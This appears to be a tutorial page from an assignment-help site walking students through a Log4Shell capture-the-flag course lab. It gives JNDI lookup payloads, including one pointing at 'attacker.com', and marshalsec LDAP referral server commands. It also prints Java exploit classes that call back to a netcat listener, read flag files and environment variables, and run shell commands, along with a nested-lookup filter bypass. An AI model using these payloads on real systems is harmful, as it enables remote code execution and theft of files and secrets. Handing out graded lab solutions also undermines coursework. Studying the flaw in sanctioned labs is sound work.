Assignment Chef icon Assignment Chef
All English tutorials

Programming lesson

Log4Shell Exploitation Guide: Capture the Flag for CS6035 Fall 2025

Step-by-step tutorial to exploit Log4Shell vulnerability in a CTF environment. Learn JNDI injection, LDAP reference server setup, and flag extraction for CS6035 Fall 2025.

Log4Shell exploit CS6035 fall 2025 Log4j vulnerability JNDI injection LDAP reference server CTF flag extraction Log4j RCE marshalsec Java exploit class netcat listener environment variable flag file read exploit command execution nested lookup bypass Log4j tutorial cybersecurity CTF

Introduction to Log4Shell and the CTF Assignment

Log4Shell (CVE-2021-44228) is a critical remote code execution vulnerability in Apache Log4j, a widely used Java logging library. In this Capture the Flag (CTF) assignment for CS6035 Fall 2025, you will exploit a deliberately vulnerable web application to retrieve flags. This tutorial covers the first six required flags, providing hints and techniques without giving away the exact solutions. By the end, you'll understand JNDI injection, LDAP servers, and malicious payload delivery.

Understanding the Vulnerability

Log4j supports message lookup substitution using ${prefix:name} syntax, such as ${java:version} or ${env:USER}. The vulnerability arises when user-controlled input is logged and contains a JNDI lookup like ${jndi:ldap://attacker.com/a}. Log4j fetches the LDAP object, which can point to a remote class file, leading to arbitrary code execution. For a real-world analogy, think of it like a smart home assistant that executes commands from any spoken phrase – if an attacker whispers a malicious command, the assistant runs it without verification.

Setting Up the Exploitation Environment

You'll need four terminal windows running simultaneously. Follow these steps carefully.

Step 1: User Authentication and Container Start

Switch to the log4j user and start the container:

su - log4j
cd ~
./StartContainer.sh

Ensure the container starts without errors.

Step 2: Log Monitoring

In a second terminal, monitor logs:

cd Desktop/log4shell/logs
tail -f cs6035.log

If logs stop updating, restart the command due to log rotation.

Step 3: LDAP Reference Server

In terminal three, start the LDAP server:

cd ~/Desktop/log4shell/target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://172.17.0.1:4242/#Exploit"

This tells Log4j to fetch the exploit class from your HTTP server.

Step 4: Malicious Payload Server

In terminal four, serve your exploit class:

cd <flag-specific-directory>
python3 -m http.server 4242

Place your compiled .class file in this directory. The port must match the LDAP server.

Flag 1: Introduction Flag

This flag is a warm-up. You need to trigger a simple JNDI lookup that returns a string. Craft a payload that uses ${jndi:ldap://your-ip:1389/flag1} and submit it via the web application's input field (e.g., a search box or user-agent header). The LDAP server will return a reference to a class that prints the flag. Your exploit class can simply output a string or use a static method. Monitor the logs to see the flag appear.

Flag 2: Network Listener Flag

For this flag, you must set up a netcat listener to receive a reverse connection. In terminal five, run:

nc -nlvp 4444

Your exploit class should connect back to this listener. Use Java code like:

import java.io.*;
import java.net.*;
public class Exploit {
    static {
        try {
            Socket s = new Socket("172.17.0.1", 4444);
            PrintWriter out = new PrintWriter(s.getOutputStream(), true);
            out.println("Flag2: ...");
            s.close();
        } catch (Exception e) {}
    }
}

Compile with javac Exploit.java and serve the class. When the web app logs your payload, the class executes and sends the flag to your listener.

Flag 3: File Read Flag

You need to read a file from the server, e.g., /home/log4j/flag3.txt. Modify your exploit class to read the file and output its content. Use standard Java file I/O:

BufferedReader br = new BufferedReader(new FileReader("/home/log4j/flag3.txt"));
String line = br.readLine();
// Send to listener or print via log

Since the exploit runs in the context of the web app, you can access files readable by that user. The flag content can be returned via log output or sent to your listener.

Flag 4: Environment Variable Flag

This flag is stored in an environment variable, e.g., FLAG4. In your exploit class, use System.getenv("FLAG4") to retrieve it. Then output it similarly to Flag 3. For example:

String flag = System.getenv("FLAG4");
// Print to log or send to listener

Remember that environment variables are accessible to the Java process.

Flag 5: RCE and Command Execution Flag

You need to execute a shell command to get the flag. For instance, run cat /home/log4j/flag5.txt. Use Runtime.getRuntime().exec() in your exploit:

Process p = Runtime.getRuntime().exec("cat /home/log4j/flag5.txt");
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String flag = reader.readLine();
// Send to listener

Ensure you handle the process output correctly. This simulates a real RCE scenario.

Flag 6: Chained Exploit Flag

This flag requires chaining multiple lookups or using a more complex payload. For example, you might need to use ${${env:FLAG6:-${jndi:ldap://...}}} to bypass filters. Alternatively, you may need to combine a file read and environment variable. Experiment with nested lookups. The key is to understand how Log4j processes multiple substitutions.

Debugging and Troubleshooting

Common issues include port mismatches, IP address errors, and class file serving from the wrong directory. Use the logs to see if your LDAP server receives requests. If the exploit doesn't trigger, check that your payload is being logged. Try using a simple lookup like ${java:version} first to confirm the vulnerability works.

Connecting to Current Trends

Log4Shell is a prime example of how a seemingly minor logging feature can lead to catastrophic breaches – similar to how a single misconfigured API in a popular AI app like ChatGPT could expose user data. In the gaming world, think of it as an exploit in a game's chat system that lets attackers run code on players' machines. Understanding this vulnerability is crucial for modern cybersecurity, especially as cloud services and microservices rely heavily on logging.

Conclusion

By completing these flags, you've gained hands-on experience with one of the most impactful vulnerabilities of the decade. Remember to use this knowledge ethically and only on systems you own or have permission to test. For the extra credit flag (Flag 7), explore bypassing WAF filters or using different JNDI protocols like RMI.